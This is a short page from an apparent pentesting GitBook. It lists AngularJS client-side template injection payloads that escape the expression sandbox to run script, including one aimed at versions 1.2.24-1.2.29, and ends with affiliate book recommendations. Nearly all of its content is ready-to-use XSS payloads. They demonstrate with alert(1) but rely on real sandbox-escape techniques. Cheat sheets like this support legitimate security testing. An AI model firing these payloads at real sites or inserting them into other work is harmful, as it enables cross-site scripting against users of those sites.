Angular

{{constructor.constructor('alert(1)')()}}

{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}

{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29:

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

More payloads:

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated 1 month ago